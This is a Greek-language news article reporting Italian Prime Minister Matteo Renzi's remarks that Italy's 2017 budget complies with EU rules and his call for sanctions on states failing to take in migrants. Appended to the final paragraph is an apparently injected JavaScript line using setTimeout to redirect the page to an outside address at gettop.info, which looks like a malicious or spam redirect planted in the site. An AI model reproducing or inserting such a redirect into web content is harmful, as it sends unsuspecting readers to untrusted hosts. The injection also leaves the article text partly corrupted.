Ρέντσι: O προϋπολογισμός μας σέβεται πλήρως τους κανόνες της ΕE

0
11

 

«O προϋπολογισμός του ιταλικού δημοσίου για το 2017 σέβεται πλήρως τους κανόνες της Ευρωπαϊκής Ένωσης», δήλωσε ο Ιταλός πρωθυπουργός Ματέο Ρέντσι, κατά την ολοκλήρωση της επίσκεψής του στις Ηνωμένες Πολιτείες.

«Η Ρώμη, βέβαια, είναι έτοιμη να ακούσει με προσοχή σε περίπτωση που οι Βρυξέλλες υπογραμμίσουν κάποια σημεία», πρόσθεσε ο Ιταλός πρωθυπουργός, σύμφωνα με τον οποίο πάντως «κάθε χρόνο, τον Οκτώβριο, γίνεται η ίδια συζήτηση για το τι θα κάνει η Ευρώπη με τον προϋπολογισμό της Ιταλίας». «Πρόκειται για μια σταθερή συζήτηση, σαν τα φύλλα που πέφτουν πάντα την ίδια περίοδο από τα δέντρα», είπε ο Ρέντσι.

Αναφερόμενος στο μεταναστευτικό και στο προσφυγικό, ο επικεφαλής της κυβέρνησης της Ρώμης επανέλαβε ότι όλοι πρέπει να καταβάλουν μεγαλύτερη και πιο ουσιαστική προσπάθεια.

«Αναμένουμε την επιβολή κυρώσεων εκ μέρους της Ένωσης σε εκείνους που δεν σέβονται τους ευρωπαϊκούς κανόνες. Σε βάρος όσων είχαν υποσχεθεί να υποδεχθούν μετανάστες αλλά δεν το έκαναν», κατέληξε ο Ιταλός πρωθυπουργός. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here